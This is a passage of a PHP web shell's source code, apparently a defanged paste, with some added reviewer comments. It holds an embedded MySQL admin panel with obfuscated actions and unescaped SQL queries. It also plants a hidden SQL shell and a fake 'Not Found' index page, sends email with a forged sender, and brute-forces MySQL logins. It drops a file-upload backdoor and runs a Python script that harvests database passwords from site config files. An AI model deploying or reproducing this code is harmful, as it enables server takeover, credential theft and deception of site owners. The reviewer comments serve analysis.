1507 echo "<input type=button value='Cancel' onClick='history.back()'>\n";
1508 echo "</form>\n";
1509}
1510
// Writes one row from the add/edit form: builds "INSERT INTO ... VALUES (...)"
// for "add" or "REPLACE INTO ... VALUES (...)" for "edit", runs it, stores the
// server error text in $errMsg and redraws the table via viewData("").
// Values are taken positionally, one per column, from $GLOBALS[<column name>];
// a non-empty $GLOBALS["<column>_function"] wraps the value in that function.
// NOTE(review): neither the values nor the function names are escaped or
// checked against the list the form offers, and numeric columns are inserted
// unquoted. The globals are not set here; presumably they are the posted form
// fields -- confirm against the code that populates them.
1511function manageData_submit( $cmd ) {
1512 global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
1513 $pResult = mysql_list_fields( $dbname, $tablename );
1514 $num = mysql_num_fields( $pResult );
1515 mysql_select_db( $dbname, $mysqlHandle );
1516 if( $cmd == "add" )
1517 $queryStr = "INSERT INTO $tablename VALUES (";
1518 else if( $cmd == "edit" )
1519 $queryStr = "REPLACE INTO $tablename VALUES (";
 // All columns except the last, each followed by a comma.
1520 for( $i = 0; $i < $num-1; $i++ ) {
1521 $field = mysql_fetch_field( $pResult );
1522 $func = $GLOBALS[$field->name."_function"];
1523 if( $func != "" )
1524 $queryStr .= " $func(";
1525 if( $field->numeric == 1 ) {
1526 $queryStr .= $GLOBALS[$field->name];
1527 if( $func != "" )
1528 $queryStr .= "),";
1529 else
1530 $queryStr .= ",";
1531 } else {
1532 $queryStr .= "'" . $GLOBALS[$field->name];
1533 if( $func != "" )
1534 $queryStr .= "'),";
1535 else
1536 $queryStr .= "',";
1537 }
1538 }
 // The last column closes the VALUES list; it is appended without looking
 // at its "<column>_function" entry.
1539 $field = mysql_fetch_field( $pResult );
1540 if( $field->numeric == 1 )
1541 $queryStr .= $GLOBALS[$field->name] . ")";
1542 else
1543 $queryStr .= "'" . $GLOBALS[$field->name] . "')";
1544 mysql_query( $queryStr , $mysqlHandle );
1545 $errMsg = mysql_error();
1546 viewData( "" );
1547}
1548
// Deletes the row addressed by the table's primary key: builds
// "DELETE FROM $tablename WHERE pk1=... AND pk2=...", runs it, stores the
// server error text in $errMsg and redraws the table via viewData("").
// NOTE(review): key values are read from $GLOBALS[<column name>] and
// concatenated unescaped (numeric columns unquoted, others single-quoted).
// They are not set here; presumably they are the values carried in the Delete
// link -- confirm. The request is a plain link, so a logged GET with
// action=deleteData is what this code path looks like from the outside.
1549function deleteData() {
1550 global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
1551 $pResult = mysql_list_fields( $dbname, $tablename );
1552 $num = mysql_num_fields( $pResult );
1553 $key = "";
1554 for( $i = 0; $i < $num; $i++ ) {
1555 $field = mysql_fetch_field( $pResult, $i );
1556 if( $field->primary_key == 1 )
1557 if( $field->numeric == 1 )
1558 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
1559 else
1560 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
1561 }
 // Cut the trailing "AND ".
1562 $key = substr( $key, 0, strlen($key)-4 );
1563 mysql_select_db( $dbname, $mysqlHandle );
1564 $queryStr = "DELETE FROM $tablename WHERE $key";
1565 mysql_query( $queryStr, $mysqlHandle );
1566 $errMsg = mysql_error();
1567 viewData( "" );
1568}
1569
// Writes a SQL dump of one table straight to the response body: a
// "DROP TABLE IF EXISTS" line, the table's SHOW CREATE TABLE definition, then
// one "INSERT INTO ... VALUES(...)" line per row.
// $table: table name, interpolated unescaped into every statement.
// Nothing is returned; the whole table content is echoed, so the response
// size tracks the table size.
1570function fetch_table_dump_sql($table)
1571{
1572 global $mysqlHandle,$dbname;
1573 mysql_select_db( $dbname, $mysqlHandle );
1574 $query_id = mysql_query("SHOW CREATE TABLE $table",$mysqlHandle);
1575 $tabledump = mysql_fetch_array($query_id, MYSQL_ASSOC);
1576 $tabledump = "DROP TABLE IF EXISTS $table;\n" . $tabledump['Create Table'] . ";\n\n";
1577 echo $tabledump;
1578 // get data
1579 $rows = mysql_query("SELECT * FROM $table",$mysqlHandle);
1580 $numfields=mysql_num_fields($rows);
1581 while ($row = mysql_fetch_array($rows, MYSQL_NUM))
1582 {
1583 $tabledump = "INSERT INTO $table VALUES(";
1584 $fieldcounter = -1;
1585 $firstfield = 1;
1586 // get each field's data
 // $firstfield suppresses the ", " separator before the first value.
1587 while (++$fieldcounter < $numfields)
1588 {
1589 if (!$firstfield)
1590 {
1591 $tabledump .= ', ';
1592 }
1593 else
1594 {
1595 $firstfield = 0;
1596 }
 // Unset (NULL) columns are written as the keyword NULL; everything else
 // is single-quoted after mysql_escape_string().
1597 if (!isset($row["$fieldcounter"]))
1598 {
1599 $tabledump .= 'NULL';
1600 }
1601 else
1602 {
1603 $tabledump .= "'" . mysql_escape_string($row["$fieldcounter"]) . "'";
1604 }
1605 }
1606 $tabledump .= ");\n";
1607 echo $tabledump;
1608 }
1609 @mysql_free_result($rows);
1610}
1611
// Sends a SQL dump as a file-style response and ends the request.
// With $action == "dumpTable" only $tablename is dumped; any other value
// dumps every table returned by SHOW tables for $dbname.
// The literal strings in this block are stable markers for response
// inspection: a "Content-disposition: filename=<name>.sql" header, the
// "Content-type: unknown/unknown" header, and the trailers
// "### <name> TABLE DUMP COMPLETED ###" / "### <name> DATABASE DUMP COMPLETED ###".
// NOTE(review): $tablename and $dbname are placed in the header unescaped.
1612function dump() {
1613 global $mysqlHandle, $action, $dbname, $tablename;
1614 if( $action == "dumpTable" ){
1615 header("Content-disposition: filename=$tablename.sql");
1616 header('Content-type: unknown/unknown');
1617 fetch_table_dump_sql($tablename);
1618 echo "\n\n\n";
1619 echo "\r\n\r\n\r\n### $tablename TABLE DUMP COMPLETED ###";
1620 exit;
1621 }else{
1622 header("Content-disposition: filename=$dbname.sql");
1623 header('Content-type: unknown/unknown');
1624 mysql_select_db( $dbname, $mysqlHandle );
1625 $query_id = mysql_query("SHOW tables",$mysqlHandle);
 // One dump section per table, each followed by its own trailer line.
1626 while ($row = mysql_fetch_array($query_id, MYSQL_NUM))
1627 {
1628 fetch_table_dump_sql($row[0]);
1629 echo "\n\n\n";
1630 echo "\r\n\r\n\r\n### $row[0] TABLE DUMP COMPLETED ###";
1631 echo "\n\n\n";
1632 }
1633 echo "\r\n\r\n\r\n### $dbname DATABASE DUMP COMPLETED ###";
1634 exit;
1635 }
1636}
1637
// "Utilities" page driven by the global $command.
// - $command empty or starting with "flush": prints the Show/Flush menu and,
//   when $command is exactly one of flush_hosts, flush_logs,
//   flush_privileges, flush_tables or flush_status, runs the matching FLUSH
//   statement and prints "- Success" or "- Fail" next to its link.
// - any other $command: underscores are replaced by spaces and the result is
//   sent to the server as a statement; the result set is printed as an HTML
//   table with htmlspecialchars() applied to each cell.
// NOTE(review): the menu only links show_status, show_variables and
// show_processlist, but the else branch does not compare $command against
// that list. $command is not set here; presumably it is a request parameter
// -- confirm. $queryStr is also echoed into the page unescaped.
1638function utils() {
1639 global $PHP_SELF, $command;
1640 echo "<h1>Utilities</h1>\n";
1641 if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
1642 echo "<hr>\n";
1643 echo "Show\n";
1644 echo "<ul>\n";
1645 echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
1646 echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
1647 echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
1648 echo "</ul>\n";
1649 echo "Flush\n";
1650 echo "<ul>\n";
1651 echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
1652 if( $command == "flush_hosts" ) {
1653 if( mysql_query( "Flush hosts" ) != false )
1654 echo "- Success";
1655 else
1656 echo "- Fail";
1657 }
1658 echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
1659 if( $command == "flush_logs" ) {
1660 if( mysql_query( "Flush logs" ) != false )
1661 echo "- Success";
1662 else
1663 echo "- Fail";
1664 }
1665 echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
1666 if( $command == "flush_privileges" ) {
1667 if( mysql_query( "Flush privileges" ) != false )
1668 echo "- Success";
1669 else
1670 echo "- Fail";
1671 }
1672 echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
1673 if( $command == "flush_tables" ) {
1674 if( mysql_query( "Flush tables" ) != false )
1675 echo "- Success";
1676 else
1677 echo "- Fail";
1678 }
1679 echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
1680 if( $command == "flush_status" ) {
1681 if( mysql_query( "Flush status" ) != false )
1682 echo "- Success";
1683 else
1684 echo "- Fail";
1685 }
1686 echo "</ul>\n";
1687 } else {
 // e.g. "show_status" becomes "show status".
1688 $queryStr = ereg_replace( "_", " ", $command );
1689 $pResult = mysql_query( $queryStr );
1690 if( $pResult == false ) {
1691 echo "Fail";
1692 return;
1693 }
1694 $col = mysql_num_fields( $pResult );
1695 echo "<p class=location>$queryStr</p>\n";
1696 echo "<hr>\n";
1697 echo "<table cellspacing=1 cellpadding=2 border=0>\n";
1698 echo "<tr>\n";
1699 for( $i = 0; $i < $col; $i++ ) {
1700 $field = mysql_fetch_field( $pResult, $i );
1701 echo "<th>".$field->name."</th>\n";
1702 }
1703 echo "</tr>\n";
1704 while( 1 ) {
1705 $rowArray = mysql_fetch_row( $pResult );
1706 if( $rowArray == false ) break;
1707 echo "<tr>\n";
1708 for( $j = 0; $j < $col; $j++ )
1709 echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
1710 echo "</tr>\n";
1711 }
1712 echo "</table>\n";
1713 }
1714}
// Prints the page footer: the current $USERNAME followed by navigation links
// (Database List, Table List when $tablename is set, Utils, Logout).
// The Database List link uses action=bGlzdERCcw==, which is the base64
// encoding of "listDBs"; the other actions are plain text.
// $USERNAME, $dbname and $tablename are echoed unescaped.
1715function footer_html() {
1716 global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
1717 echo "<hr>\n";
1718 echo "<span class=\"new\">[$USERNAME]</span> - \n";
1719 echo "<a href='$PHP_SELF?action=bGlzdERCcw=='>Database List</a> | \n";
1720 if( $tablename != "" )
1721 echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
1722 echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
1723 echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
1724}
1725//------------- MAIN ------------- //
// Request dispatcher for the embedded MySQL admin page. $action selects the
// handler; it is not assigned in this block, presumably it is a request
// parameter -- confirm.
// Three action values are compared in base64 form and never decoded here:
// "bG9nb25fc3VibWl0" = "logon_submit", "bGlzdERCcw==" = "listDBs",
// "dmlld0RhdGE=" = "viewData". The rest are plain text.
// Database credentials are not kept server-side: every request re-reads
// username, password and hostname from the cookies
// mysql_web_admin_username / mysql_web_admin_password /
// mysql_web_admin_hostname and opens a new connection to <hostname>:3306.
// Those cookie names, carrying credentials in clear text, are a stable
// indicator in proxy or WAF logs.
// The mysql_* functions were removed in PHP 7.0 and each() in PHP 8.0, so
// this listing only runs on older PHP versions.
// Errors are neither displayed nor logged for the rest of the request.
1726error_reporting(0);
1727ini_set ('display_errors', 0);
1728ini_set ('log_errors', 0);
1729if( $action == "logon" || $action == "" || $action == "logout" )
1730 logon();
1731else if( $action == "bG9nb25fc3VibWl0" )
1732 logon_submit();
1733else if( $action == "dumpTable" || $action == "dumpDB" ) {
 // NOTE(review): $hxxp_COOKIE_VARS looks like the paste's URL defanging
 // applied to $HTTP_COOKIE_VARS -- confirm against an original sample.
1734 while( list($var, $value) = each($hxxp_COOKIE_VARS) ) {
1735 if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
1736 if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
1737 if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
1738 }
 // The dump path calls dump() without checking whether the connection
 // succeeded and emits no HTML of its own, since dump() sets headers.
1739 $mysqlHandle = @mysql_connect( $HOSTNAME.":3306", $USERNAME, $PASSWORD );
1740 dump();
1741} else {
1742 while( list($var, $value) = each($hxxp_COOKIE_VARS) ) {
1743 if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
1744 if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
1745 if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
1746 }
 // The connect call is wrapped in an HTML comment so that anything it prints
 // stays hidden in the rendered page.
1747 echo "<!--";
1748 $mysqlHandle = @mysql_connect( $HOSTNAME.":3306", $USERNAME, $PASSWORD );
1749 echo "-->";
1750 if( $mysqlHandle == false ) {
1751 echo "<table width=100% height=100%><tr><td><center>\n";
1752 echo "<h1>Wrong Password!</h1>\n";
1753 echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
1754 echo "</center></td></tr></table>\n";
1755 } else {
 // Connected: route to the handler named by $action. An unrecognised
 // action runs no handler and only prints the footer.
1756 if( $action == "bGlzdERCcw==" )
1757 listDatabases();
1758 else if( $action == "createDB" )
1759 createDatabase();
1760 else if( $action == "dropDB" )
1761 dropDatabase();
1762 else if( $action == "listTables" )
1763 listTables();
1764 else if( $action == "createTable" )
1765 createTable();
1766 else if( $action == "dropTable" )
1767 dropTable();
1768 else if( $action == "viewSchema" )
1769 viewSchema();
1770 else if( $action == "query" )
1771 viewData( $queryStr );
1772 else if( $action == "addField" )
1773 manageField( "add" );
1774 else if( $action == "addField_submit" )
1775 manageField_submit( "add" );
1776 else if( $action == "editField" )
1777 manageField( "edit" );
1778 else if( $action == "editField_submit" )
1779 manageField_submit( "edit" );
1780 else if( $action == "dropField" )
1781 dropField();
1782 else if( $action == "dmlld0RhdGE=" )
1783 viewData( "" );
1784 else if( $action == "addData" )
1785 manageData( "add" );
1786 else if( $action == "addData_submit" )
1787 manageData_submit( "add" );
1788 else if( $action == "editData" )
1789 manageData( "edit" );
1790 else if( $action == "editData_submit" )
1791 manageData_submit( "edit" );
1792 else if( $action == "deleteData" )
1793 deleteData();
1794 else if( $action == "utils" )
1795 utils();
1796 mysql_close( $mysqlHandle);
1797 footer_html();
1798 }
1799}
1800?>
1801<html>
1802<head>
1803<title>MySQL Interface (Developed By Mohajer22)</title>
1804<body bgColor=#000000 >
1805<style type="text/css">
1806<!--
1807p.location {
1808 color: #00FF00;
1809}
1810h1, h2, h3 {
1811 color: #00FF00;
1812}
1813th {
1814 background-color: #222222;
1815 color: #00FF00;
1816 font-size: small;
1817}
1818td {
1819 color: #00FF00;
1820 background-color: #444444;
1821 font-size: small;
1822}
1823form {
1824 margin-top: 0;
1825 margin-bottom: 0;
1826}
1827a {
1828 text-decoration:none;
1829 color: #00FF00;
1830 font-size:small;
1831}
1832A:link {
1833COLOR:#FFFFFF;
1834TEXT-DECORATION: none
1835}
1836A:visited {
1837COLOR:#00FF00;
1838TEXT-DECORATION: none
1839}
1840A:active {
1841COLOR:#00FF00;
1842TEXT-DECORATION: none
1843}
1844A:hover {
1845color:#00FF00;
1846TEXT-DECORATION: none
1847}
1848input, select, textarea {
1849background-color: #000000;
1850border-style: solid;
1851font-family: Tahoma,Verdana,Arial,Sans-Serif;
1852font-size:small;
1853color: #00FF00;
1854padding: 0px;
1855}
1856li {
1857color: #00FF00;
1858}
1859.new {
1860color: #00FF00;
1861}
1862//-->
1863</style>
1864</head>'; $file = fopen("db-sql.php" ,"w+"); $write = fwrite ($file ,base64_decode($sqlshell)); fclose($file); chmod("db-sql.php", 0644); $indexshell = fopen("index.php" ,"w+"); $data = '<h1>Not Found</h1>
1865<p>The requested URL was not found on this server.</p>
1866<hr>
1867<address>Apache Server at <?=$_SERVER['hxxp_HOST']?> Port 80</address>
1868 <style>
1869 input { margin:0;background-color:#fff;border:1px solid #fff; }
1870 </style>'; $tulis = fwrite( $indexshell, base64_decode($data)); fclose($indexshell); echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){ if(isset($_POST['mail_send'])){ $mail_to = $_POST['mail_to']; $mail_from = $_POST['mail_from']; $mail_subject = $_POST['mail_subject']; $mail_content = magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?>
1871<form action="?y=<?php echo $pwd; ?>&x=mail" method="post">
1872<table class="cmdbox">
1873<tr><td>
1874<textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me A.S.A.P</textarea>
1875<tr><td> <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" /> mail to</td></tr>
1876<tr><td> <input class="inputz" style="width:20%;" type="text" value="BlackEagle@fbi.gov" name="mail_from" /> from</td></tr>
1877<tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" /> subject</td></tr>
1878<tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>
1879<tr><td> <?php echo $msg; ?></td></tr>
1880</table>
1881</form>
1882
1883<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
1884 <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
1885 <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
1886 <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
1887 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
1888 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
1889 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
1890 </form>
1891 </td></tr>
1892 <tr><td>Size</td><td>".ukuran($file)."</td></tr>
1893 <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
1894 <tr><td>Owner</td><td>".$owner."</td></tr>
1895 <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
1896 <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
1897 <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
1898 <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr>
1899 <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr>
1900 </table>
1901 "; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
1902<form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post">
1903<table class="cmdbox">
1904<tr><td colspan="2">
1905<textarea class="output" name="content">
1906<?php echo $content; ?>
1907</textarea>
1908<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
1909 <?php echo $msg; ?></td></tr>
1910</table>
1911</form>
1912<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')) { ?>
1913<form action="?y=<?php echo $pwd; ?>&x=logout" method="post">
1914
1915<?php unset($_SESSION[md5($_SERVER['hxxp_HOST'])]); echo 'bye!'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')) { ?>
1916 <form action="?y=<?php echo $pwd; ?>&x=brute" method="post">
1917 <?php ?>
1918<meta hxxp-equiv="Content-Type" content="text/html; charset=utf-8" />
1919<?php @set_time_limit(0); @error_reporting(0); if($_POST['page']=='find') { if(isset($_POST['usernames']) && isset($_POST['passwords'])) { if($_POST['type'] == 'passwd'){ $e = explode("\n",$_POST['usernames']); foreach($e as $value){ $k = explode(":",$value); $username .= $k['0']." "; } }elseif($_POST['type'] == 'simple'){ $username = str_replace("\n",' ',$_POST['usernames']); } $a1 = explode(" ",$username); $a2 = explode("\n",$_POST['passwords']); $id2 = count($a2); $ok = 0; foreach($a1 as $user ) { if($user !== '') { $user=trim($user); for($i=0;$i<=$id2;$i++) { $pass = trim($a2[$i]); if(@mysql_connect('localhost',$user,$pass)) { echo "Gca~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />"; $ok++; } } } } echo "<hr><b>You Found <font color=green>$ok</font> Cpanel</b>"; echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } } if($_POST['pass']=='password'){ @error_reporting(0); $i = getenv('REMOTE_ADDR'); $d = date('D, M jS, Y H:i',time()); $h = $_SERVER['hxxp_HOST']; $dir=$_SERVER['PHP_SELF']; $back = "<?php
1920echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
1921echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
1922if( $_POST['_upl'] == "Upload" ) {
1923if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Korang Dah Berjaya Upload Shell Korang!!!<b><br><br>'; }
1924else { echo '<b>Korang Gagal Upload Shell Korang!!!</b><br><br>'; }
1925}
1926?>"; $file = fopen(".php","w+"); $write = fwrite ($file ,base64_decode($back)); fclose($file); chmod(".php",0755); mkdir('config',0755); $cp = '#!/usr/bin/env python
1927
1928'''
1929By: Ahmed Shawky aka lnxg33k
1930thx: Obzy, Relik, mohab and #arabpwn
1931'''
1932
1933import sys
1934import os
1935import re
1936import subprocess
1937import urllib
1938import glob
1939from platform import system
1940
1941if len(sys.argv) != 3:
1942 print'''
1943 Usage: %s [URL...] [directory...]
1944 Ex) %s hxxp://www.test.com/test/ [dir ...]''' % (sys.argv[0], sys.argv[0])
1945 sys.exit(1)
1946
1947site = sys.argv[1]
1948fout = sys.argv[2]
1949
1950try:
1951 req = urllib.urlopen(site)
1952 read = req.read()
1953 if system() == 'Linux':
1954 f = open('/tmp/data.txt', 'w')
1955 f.write(read)
1956 f.close()
1957 if system() == 'Windows':
1958 f = open('data.txt', 'w')
1959 f.write(read)
1960 f.close()
1961
1962 i = 0
1963 if system() == 'Linux':
1964 f = open('/tmp/data.txt', 'rU')
1965 for line in f:
1966 if line.startswith('<li><a') == True :
1967 m = re.search(r'(<a href=")(.+[^>])(">)', line)
1968 i += 1
1969 local_name = '%s/file%d.txt' % (fout, i)
1970 print 'Retrieving...\t\t', site + m.group(2)
1971 try: urllib.urlretrieve(site + m.group(2), local_name)
1972 except IOError:
1973 print '\n[%s] doesn\'t exist, create it first' % fout
1974 sys.exit()
1975 if line.startswith('<img') == True:
1976 m1 = re.search(r'(<a href=")(.+[^>])(">)', line)
1977 i += 1
1978 local_name = '%s/file%d.txt' % (fout, i)
1979 print 'Retrieving...\t\t', site + m1.group(2)
1980 try: urllib.urlretrieve(site + m1.group(2), local_name)
1981 except IOError:
1982 print '\n[%s] doesn\'t exist, create it first' % fout
1983 sys.exit()
1984 if line.startswith('<IMG') == True:
1985 m2 = re.search(r'(<A HREF=")(.+[^>])(">)', line)
1986 i += 1
1987 local_name = '%s/file%d.txt' % (fout, i)
1988 print 'Retrieving...\t\t', site + m2.group(2)
1989 try: urllib.urlretrieve(site + m2.group(2), local_name)
1990 except IOError:
1991 print '\n[%s] doesn\'t exist, create it first' % fout
1992 sys.exit()
1993 f.close()
1994 if system() == 'Windows':
1995 f = open('data.txt', 'rU')
1996 for line in f:
1997 if line.startswith('<li><a') == True :
1998 m = re.search(r'(<a href=")(.+[^>])(">)', line)
1999 i += 1
2000 local_name = '%s/file%d.txt' % (fout, i)
2001 print 'Retrieving...\t\t', site + m.group(2)
2002 try: urllib.urlretrieve(site + m.group(2), local_name)
2003 except IOError:
2004 print '\n[%s] doesn\'t exist, create it first' % fout
2005 sys.exit()
2006 if line.startswith('<img') == True:
2007 m1 = re.search(r'(<a href=")(.+[^>])(">)', line)
2008 i += 1
2009 local_name = '%s/file%d.txt' % (fout, i)
2010 print 'Retrieving...\t\t', site + m1.group(2)
2011 try: urllib.urlretrieve(site + m1.group(2), local_name)
2012 except IOError:
2013 print '\n[%s] doesn\'t exist, create it first' % fout
2014 sys.exit()
2015 if line.startswith('<IMG') == True:
2016 m2 = re.search(r'(<A HREF=")(.+[^>])(">)', line)
2017 i += 1
2018 local_name = '%s/file%d.txt' % (fout, i)
2019 print 'Retrieving...\t\t', site + m2.group(2)
2020 try: urllib.urlretrieve(site + m2.group(2), local_name)
2021 except IOError:
2022 print '\n[%s] doesn\'t exist, create it first' % fout
2023 sys.exit()
2024 f.close()
2025 if system() == 'Linux':
2026 cleanup = subprocess.Popen('rm -rf /tmp/data.txt > /dev/null', shell=True).wait()
2027 if system() == 'Windows':
2028 cleanup = subprocess.Popen('del C:\data.txt', shell=True).wait()
2029 print '\n', '-' * 100, '\n'
2030 if system() == 'Linux':
2031 for root, dirs, files in os.walk(fout):
2032 for fname in files:
2033 fullpath = os.path.join(root, fname)
2034 f = open(fullpath, 'r')
2035 for line in f:
2036 secr = re.search (r"(db_password'] = ')(.+[^>])(';)", line)
2037 if secr is not None: print (secr.group(2))
2038 secr1 = re.search(r"(password = ')(.+[^>])(';)", line)
2039 if secr1 is not None: print (secr1.group(2))
2040 secr2 = re.search(r"(DB_PASSWORD')(...)(.+[^>])(')", line)
2041 if secr2 is not None: print (secr2.group(3))
2042 secr3 = re.search (r"(dbpass =..)(.+[^>])(.;)", line)
2043 if secr3 is not None: print (secr3.group(2))
2044 secr4 = re.search (r"(DBPASSWORD = ')(.+[^>])(.;)", line)
2045 if secr4 is not None: print (secr4.group(2))
2046 secr5 = re.search (r"(DBpass = ')(.+[^>])(';)", line)
2047 if secr5 is not None: print (secr5.group(2))
2048 secr6 = re.search (r"(dbpasswd = ')(.+[^>])(';)", line)
2049 if secr6 is not None: print (secr6.group(2))
2050 secr7 = re.search (r"(mosConfig_password = ')(.+[^>])(';)", line)
2051 if secr7 is not None: print (secr7.group(2))
2052 f.close()
2053 if system() == 'Windows':
2054 for infile in glob.glob( os.path.join(fout, '*.txt') ):
2055 f = open(infile, 'r')
2056 for line in f:
2057 secr = re.search (r"(db_password'] = ')(.+[^>])(';)", line)
2058 if secr is not None: print (secr.group(2))
2059 secr1 = re.search(r"(password = ')(.+[^>])(';)", line)
2060 if secr1 is not None: print (secr1.group(2))
2061 secr2 = re.search(r"(DB_PASSWORD')(...)(.+[^>])(')", line)
2062 if secr2 is not None: print (secr2.group(3))
2063 secr3 = re.search (r"(dbpass =..)(.+[^>])(.;)", line)
2064 if secr3 is not None: print (secr3.group(2))
2065 secr4 = re.search (r"(DBPASSWORD = ')(.+[^>])(.;)", line)
2066 if secr4 is not None: print (secr4.group(2))
2067 secr5 = re.search (r"(DBpass = ')(.+[^>])(';)", line)
2068 if secr5 is not None: print (secr5.group(2))
2069 secr6 = re.search (r"(dbpasswd = ')(.+[^>])(';)", line)
2070 if secr6 is not None: print (secr6.group(2))
2071 secr7 = re.search (r"(mosConfig_password = ')(.+[^>])(';)", line)
2072 if secr7 is not None: print (secr7.group(2))
2073 f.close()
2074except (KeyboardInterrupt):
2075 print '\nThanks for using it ._^''; $file = fopen("cp.py","w+"); $write = fwrite ($file ,base64_decode($cp)); fclose($file); chmod("cp.py",0755); $url = $_POST['url']; echo"<center>
2076<textarea cols=\"90\" rows=\"20\" name=\"usernames\">"; system("python cp.py $url config"); unlink ('cp.py'); echo"</textarea>
